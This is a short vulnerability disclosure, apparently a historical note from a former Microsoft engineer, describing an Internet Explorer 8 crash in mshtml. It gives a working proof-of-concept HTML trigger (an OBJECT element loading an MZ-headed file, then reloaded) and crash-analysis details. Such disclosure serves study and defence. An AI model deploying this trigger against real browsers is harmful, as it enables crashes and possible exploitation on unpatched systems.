Loading a binary file (exe, zip, etc.) inside an OBJECT element and then reloading its contents via parentWindow.location.reload() crashes IE8 with a PROBABLY_EXPLOITABLE write near NULL in mshtml!PostManResume+0xcf.

<object id="oBin" data="bin.exe" type="text/html" width="400" height="60"></object>
<input type="button" onclick="oBin.parentWindow.location.reload();"
       value="Click here"> to reload object contents and crash the browser.

The binary file must have a valid MZ header (the first two bytes must be MZ). The bin.exe used here contains only three bytes: MZA — changing either M or Z prevents the crash. The !exploitable analysis classifies this as a user-mode write AV near NULL (hash 0x3e682f3b.0x231c030a). Tested on IE8/Win7 and IE8/XP.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.